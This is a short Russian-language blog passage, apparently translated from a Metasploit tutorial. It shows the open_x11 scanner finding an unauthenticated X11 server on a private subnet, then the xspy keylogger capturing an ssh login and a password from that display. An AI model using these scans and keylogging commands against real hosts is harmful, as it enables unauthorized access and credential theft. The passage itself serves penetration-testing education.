Также как сканер «vnc_auth», «Open_X11» сканер позволяет сканировать диапазон IP адресов на наличие серверов X11, позволяющих подключение пользователей без аутентификации. Подумайте о разрушительных действиях от атаки, которая может быть проведена в результате этой грубой ошибки конфигурации.
Для задействования этого метода мы опять выбираем вспомогательный модуль, определяем параметры и запускаем.
[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2
...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32
...
[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed
В качестве примера того, чтобы мы смогли сделать далее, а именно, запустить клавиатурный шпион.
root@bt4:/# cd /pentest/sniffers/xspy/
root@bt4:/pentest/sniffers/xspy# ./xspy -display 192.168.1.101:0 -delay 100
ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit
Э_L_A_Y c brutforcer.ru
Inscription à :
Publier les commentaires (Atom)
Aucun commentaire:
Enregistrer un commentaire